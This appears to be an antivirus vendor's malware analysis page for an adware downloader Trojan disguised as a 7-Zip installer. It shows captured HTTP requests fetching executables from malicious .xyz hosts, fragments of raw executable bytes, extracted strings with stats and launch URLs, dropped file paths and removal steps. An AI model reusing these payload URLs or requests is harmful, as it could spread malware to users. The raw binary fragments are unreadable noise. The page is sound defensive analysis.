p://VVV.w3.org/TR/html4/loose.dtd">.<HTML><HEAD><MET
A HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">
;.<TITLE>ERROR: The request could not be satisfied</TITLE>
.</HEAD><BODY>.<H1>ERROR</H1>.<H2>The re
quest could not be satisfied.</H2>.<HR noshade size="1px">
.This distribution is not configured to allow the HTTP request method 
that was used for this request. The distribution supports only cachabl
e requests..<BR clear="all">.<HR noshade size="1px">.<P
RE>.Generated by cloudfront (CloudFront).Request ID: Kw63CdGMeEJaja
0ts4373pZspdc5wtui8c5h3ljjo8no_d-md0Y3dQ==.</PRE>.<ADDRESS>
;.</ADDRESS>.</BODY></HTML>..



GET /stub_maker.php?program=sevenzip&tid=4076285&pid=1505&b_typ=pe&reb=1&name=sw_uninstaller&name=sw_uninstaller&t=first HTTP/1.0
Host: dl.up-cp-23.xyz
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*


HTTP/1.1 200 OK
Content-Type: application/force-download
Content-Length: 76314
Connection: close
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.3.28
Content-Disposition: attachment; filename="56385f6ae869a.exe"
X-Powered-By: ASP.NET
Date: Tue, 03 Nov 2015 07:16:58 GMT
X-Cache: Miss from cloudfront
Via: 1.1 4cebe2fc1703437d8a79e556e38f6d7a.cloudfront.net (CloudFront)
X-Amz-Cf-Id: Gfpep_PWWNcDw5KV0YO4P0AMngvqMYPF3bvlV0iR8egOI_kJha4XhQ==
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......aKZe%*46%*46
%*46,R.6&*46,R.64*46%*56.*46>..6 *46>..6$*46>..6$*46Rich%*46.
.......PE..L.....GO.................r....>..B...9............@.....
......................O...........@.................................d.
........N.......................?.....................................
.................................................text...lp.......r....
.............. ..`.rdata...*.......,...v..............@[email protected]&g
t;[email protected]?........................
..rsrc.........N.....................@[email protected]...........
[email protected]...........................................................
......................................................................
......................................................................
......................................................................
...........................................................U....\.}..t
 .}[email protected][email protected]..
.E..E.P.u.....@..}[email protected]... M..........M........E
...FQ.....NU..M.......M...VT..U........FP..E...............E.P.M...H.@
[email protected]}[email protected].}.j.W.E
[email protected][email protected][email protected] [email protected]
...u....E.P.u.....@._^3.[.....L$..(&....i. @...T.....tUVW.q.3.;5,&..sD
..i. @...D..S.....t.G.....t...O..t .....u...3....3...F. @..;5,&..r
<<< skipped >>>


GET /?affId=1006&appTitle=sw_uninstaller&s1=1505&s2=4076285&setupName=cpSetup&appVersion=2.92&instId=11 HTTP/1.0
Host: get.free-me-ic.xyz
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*


HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Length: 53010
Connection: close
Server: Microsoft-IIS/8.5
X-Powered-By: PHP/5.3.28
Content-Transfer-Encoding: Binary
Content-Disposition: attachment; filename="cpSetup.exe"
Date: Tue, 03 Nov 2015 07:17:13 GMT
X-Cache: Miss from cloudfront
Via: 1.1 6640bb922817c1f6799f0abbff6736d3.cloudfront.net (CloudFront)
X-Amz-Cf-Id: CkZQKugoT3wUmVI0oBdQbT9y-9c9ou7hWbRboOy1lrYNi8Xw0YL8vQ==
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......1p.:u..iu..i
u..i...iw..iu..i...i...id..i!2.i...i...it..iRichu..i........PE..L....\
.U.................^...........2.......p....@.........................
[email protected].......... -........
...................................................................p..
.............................text...:\.......^.................. ..`.r
data.......p.......b..............@[email protected]..........
[email protected][email protected]... -...........x
..............@..@....................................................
......................................................................
......................................................................
......................................................................
......................................................................
............................................U....\.}..t .}.F.E.u..H...
[email protected]@..e...E..E.P.u....r@
..}[email protected]... M.......M....3.....FQ.....NU..M.....
.....VT..U.....FP..E...............E.P.M...Tp@[email protected]
....E..9}[email protected].}.j.W.E......E.......@[email protected]..
[email protected]<[email protected] ...Pj.h./[email protected]...\r@._
^3.[.....L$..(7B...Si.....VW.T.....tO.q.3.;5,7B.sB..i......D.......t.G
.....t...O..t .....u...3....3...F.....;5,7B.r._^[...U..QQ.U.SV..i.
<<< skipped >>>

The Trojan connects to the servers at the folowing location(s):

%original file name%.exe_468:

.text
`.rdata
@.data
.ndata
.rsrc
uDSSh
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
KERNEL32.dll
ExitWindowsEx
USER32.dll
GDI32.dll
SHFileOperationA
ShellExecuteA
SHELL32.dll
RegEnumKeyA
RegCreateKeyExA
RegCloseKey
RegDeleteKeyA
RegOpenKeyExA
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
verifying installer: %d%%
hXXp://nsis.sf.net/NSIS_Error
... %d%%
~nsu.tmp
%u.%u%s%s
RegDeleteKeyExA
%s=%s
*?|<>/":
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\b_setup.exe
Sdl.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nse2.tmp\NSISdl.dll
E~1\"%CurrentUserName%"\LOCALS~1\Temp\nse2.tmp
E~1\"%CurrentUserName%"\LOCALS~1\Temp\nse2.tmp\NSISdl.dll
.reloc
WS2_32.dll
NSISdl.dll
invalid URL
Host: %s
GET %s HTTP/1.0
User-Agent: NSISDL/1.2 (Mozilla)
http=
Software\Microsoft\Windows\CurrentVersion\Internet Settings
Unable to open %s
%skB (%d%%) of %skB at %u.ukB/s
(%u hours remaining)
(%u minutes remaining)
(%u seconds remaining)
Downloading %s
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nse2.tmp
nse2.tmp
S~1\Temp\nse2.tmp\conf
l.up-cp-23.xyz/stub_maker.php?program=sevenzip&tid=4076285&pid=1505&b_typ=pe&reb=1&name=sw_uninstaller
c:\%original file name%.exe
%original file name%.exe
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nso1.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
6648320
hXXp://dl.up-cp-23.xyz/stub_maker.php?program=sevenzip&tid=4076285&pid=1505&b_typ=pe&reb=1&name=sw_uninstaller
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v2.46</description><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false"/></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/></application></compatibility></assembly>

b_setup.exe_456:

64*46%*56
.text
`.rdata
@.data
.ndata
.rsrc
@.reloc
RegDeleteKeyExW
Kernel32.DLL
PSAPI.DLL
%s=%s
GetWindowsDirectoryW
KERNEL32.dll
ExitWindowsEx
GetAsyncKeyState
USER32.dll
GDI32.dll
SHFileOperationW
ShellExecuteW
SHELL32.dll
RegDeleteKeyW
RegCloseKey
RegEnumKeyW
RegOpenKeyExW
RegCreateKeyExW
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
xa4.IK#}
.bxSv
Y<6;(:* ),"
4$/8&0.=-%"!
8759<6;(:* )"
4$/&0.=-!
invalid URL
Host: %s
GET %s HTTP/1.0
User-Agent: NSISDL/1.2 (Mozilla)
http=
Unable to open %s
%skB (%d%%) of %skB at %u.ukB/s
(%u hours remaining)
(%u minutes remaining)
(%u seconds remaining)
Downloading %s
WS2_32.dll
NSISdl.dll
l;`]w`#r%s
7.rdata
KERNEL32.DLL
nsArray.dll
Join
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v2.46.5-Unicode</description><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="X86" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false"/></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/></application></compatibility></assembly>
logging set to %d
settings logging to %d
created uninstaller: %d, "%s"
WriteReg: error creating key "%s\%s"
WriteReg: error writing into "%s\%s" "%s"
WriteRegBin: "%s\%s" "%s"="%s"
WriteRegDWORD: "%s\%s" "%s"="0xx"
WriteRegExpandStr: "%s\%s" "%s"="%s"
WriteRegStr: "%s\%s" "%s"="%s"
DeleteRegKey: "%s\%s"
DeleteRegValue: "%s\%s" "%s"
WriteINIStr: wrote [%s] %s=%s in %s
CopyFiles "%s"->"%s"
CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
Error registering DLL: Could not load %s
Error registering DLL: %s not found in %s
GetTTFFontName(%s) returned %s
GetTTFVersionString(%s) returned %s
Exec: failed createprocess ("%s")
Exec: success ("%s")
Exec: command="%s"
ExecShell: success ("%s": file:"%s" params:"%s")
ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
Exch: stack < %d elements
RMDir: "%s"
MessageBox: %d,"%s"
Delete: "%s"
File: wrote %d to "%s"
File: skipped: "%s" (overwriteflag=%d)
File: error creating "%s"
File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"
Rename failed: %s
Rename on reboot: %s
Rename: %s
IfFileExists: file "%s" does not exist, jumping %d
IfFileExists: file "%s" exists, jumping %d
CreateDirectory: "%s" created
CreateDirectory: can't create "%s" - a file already exists
CreateDirectory: can't create "%s" (err=%d)
CreateDirectory: "%s" (%d)
SetFileAttributes: "%s":X
Sleep(%d)
detailprint: %s
Call: %d
Aborting: "%s"
Jump: %d
verifying installer: %d%%
unpacking data: %d%%
... %d%%
hXXp://nsis.sf.net/NSIS_Error
~nsu.tmp
install.log
%u.%u%s%s
Skipping section: "%s"
Section: "%s"
New install of "%s" to "%s"
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
*?|<>/":
invalid registry key
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
HKEY_PERFORMANCE_DATA
HKEY_USERS
HKEY_LOCAL_MACHINE
HKEY_CURRENT_USER
HKEY_CLASSES_ROOT
x%c
RMDir: RemoveDirectory failed("%s")
RMDir: RemoveDirectory on Reboot("%s")
RMDir: RemoveDirectory("%s")
RMDir: RemoveDirectory invalid input("%s")
Delete: DeleteFile failed("%s")
Delete: DeleteFile on Reboot("%s")
Delete: DeleteFile("%s")
%s: failed opening file "%s"
"C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsd5.tmp\cpSetup.exe"
88/SevenZip_downloader-Qb8uuvhdf.exe
ller&producturl=http://d3pccup19xda2t.cloudfront.net/sevenzip-setup-ap.exe&productimage=http://d3pccup19xda2t.cloudfront.net/pe/szip_pub.png&productversion=9.20&producteula=http://sevenzip.info/terms.html&productsize=1.06MB&productcmd=s&publishercontact=http://sevenzip.info&productbusiness=sd,se,ad,co,prm,wsa,ita,serp,bro&antivirusPolicy=2&subid=1505&subid2=4076285
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsd5.tmp\NSISdl.dll
E~1\"%CurrentUserName%"\LOCALS~1\Temp\nsd5.tmp
E~1\"%CurrentUserName%"\LOCALS~1\Temp\nsd5.tmp\NSISdl.dll
%Program Files%
\NSISdl.dll
\591853039
hXXp://up.ic-upp.xyz/stats.php?bu=
\nsArray.dll
ar_url
\\591853039
hXXp://up.cp-reffi.xyz/error.php?string=
hXXp://up.int-ic-4.xyz/launch_v5.php?p=sevenzip&pid=1505&tid=4076285&b_typ=pe&n=
hXXp://up.cp-doub.xyz/launch_v5.php?p=sevenzip&pid=1505&tid=4076285&b_typ=pe&n=
/key=
Nullsoft Install System (Unicode) v2.46.5-Unicode
\wininit.ini
Software\Microsoft\Windows\CurrentVersion\Internet Settings
1.1.1.6
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsd5.tmp
cpSetup.exe
Exec: success (""C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsd5.tmp\cpSetup.exe"")
ISdl.dll"
up19xda2t.cloudfront.net/sevenzip-setup-ap.exe&productimage=http://d3pccup19xda2t.cloudfront.net/pe/szip_pub.png&productversion=9.20&producteula=http://sevenzip.info/terms.html&productsize=1.06MB&productcmd=s&publishercontact=http://sevenzip.info&productbusiness=sd,se,ad,co,prm,wsa,ita,serp,bro&antivirusPolicy=2&subid=1505&subid2=4076285
S~1\Temp\nsd5.tmp\591853039
188/SevenZip_downloader-Qb8uuvhdf.exe
oader-Qb8uuvhdf.exe
cli/1446534132188/SevenZip_downloader-Qb8uuvhdf.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\b_setup.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp
b_setup.exe
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsn3.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
6648320
hXXp://get.free-me-ic.xyz/?affId=1006&appTitle=sw_uninstaller&s1=1505&s2=4076285&setupName=cpSetup&appVersion=2.92&instId=11
9xda2t.cloudfront.net/sevenzip-setup-ap.exe&productimage=http://d3pccup19xda2t.cloudfront.net/pe/szip_pub.png&productversion=9.20&producteula=http://sevenzip.info/terms.html&productsize=1.06MB&productcmd=s&publishercontact=http://sevenzip.info&productbusiness=sd,se,ad,co,prm,wsa,ita,serp,bro&antivirusPolicy=2&subid=1505&subid2=4076285
nloader-Qb8uuvhdf.exe
hXXp://up.int-ic-4.xyz/launch_v5.php?p=sevenzip&pid=1505&tid=4076285&b_typ=pe&n=c3dfdW5pbnN0YWxsZXI=&reb=1&ic=

b_setup.exe_456_rwx_10001000_00007000:

.text
`.rdata
@.data
.rsrc
@.reloc
/key=

cpSetup.exe_1744:

.text
`.rdata
@.data
.ndata
.rsrc
Vj%SSS
uDSSh
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
KERNEL32.dll
ExitWindowsEx
USER32.dll
GDI32.dll
SHFileOperationA
ShellExecuteA
SHELL32.dll
RegEnumKeyA
RegCreateKeyExA
RegCloseKey
RegDeleteKeyA
RegOpenKeyExA
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
verifying installer: %d%%
unpacking data: %d%%
... %d%%
hXXp://nsis.sf.net/NSIS_Error
~nsu.tmp
%u.%u%s%s
RegDeleteKeyExA
%s=%s
*?|<>/":
\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsu8.tmp\1e5d0ed8-a824-4ba6-8ba3-12728026be4e.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsu8.tmp\1e5d0ed8-a824-4ba6-8ba3-12728026be4e.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsu8.tmp
%Program Files%
\1e5d0ed8-a824-4ba6-8ba3-12728026be4e.dll
$$\wininit.ini
.Wm/S
j&.Zt
rogress32subid1: %s
5url9
{~ .text;
`.rdata
<requestedExecutionLevel level='asInvoker' uiAccess='false' />
<assemblyIdentity type='win32' name='Microsoft.Windows.Common-Controls' version='6.0.0.0' processorArchitecture='x86' publicKeyToken='6595b64144ccf1df' language='*' />
KERNEL32.DLL
Stub.dll
1.RIp
nsu8.tmp
:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsu8.tmp
"C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsd5.tmp\cpSetup.exe"
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsd5.tmp
cpSetup.exe
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsu6.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsd5.tmp\cpSetup.exe
:::#222.111 )))
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="*" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v3.0b2</description><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false"/></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"/><supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"/><supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/></application></compatibility></assembly>

cpSetup.exe_1744_rwx_10001000_00009000:

.Wm/S
subid1: %s
subid2: %s
subid3: %s
subid4: %s
subid5: %s
url1: %s
url2: %s
apptitle: %S
appimgurl: %s
appsetupurl: %s
appcmd: %s
apptyurl: %s
appversion: %s
Offer path: %s
Offer retruned: %s
hXXp://
GetProcessHeap
.text
`.rdata
@.data
.rsrc
@.reloc
rogress32subid1: %s
5url9


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    %original file name%.exe:468

  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    %Documents and Settings%\%current user%\Local Settings\Temp\nse2.tmp\conf (121 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\b_setup.exe (7800 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nse2.tmp\NSISdl.dll (14 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\nsArray.dll (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\cpSetup.exe (6937 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\NSISdl.dll (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\591853039 (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsd4.tmp (1568 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu7.tmp (14 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu8.tmp\1e5d0ed8-a824-4ba6-8ba3-12728026be4e.dll (11 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\00080f2b.a (74 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\000814aa.a (1698 bytes)

  4. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  5. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

No votes yet


Lavasoft is the maker of Ad-Aware, the world's most popular anti-malware software with over 450 million downloads.
© 2026 Lavasoft. All rights reserved.
Terms Of Use |   Privacy Policy


x

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

Download adaware antivirus 12
No thanks, continue to lavasoft.com
close x

Discover the new adaware antivirus 12

Our best antivirus yet

Download Now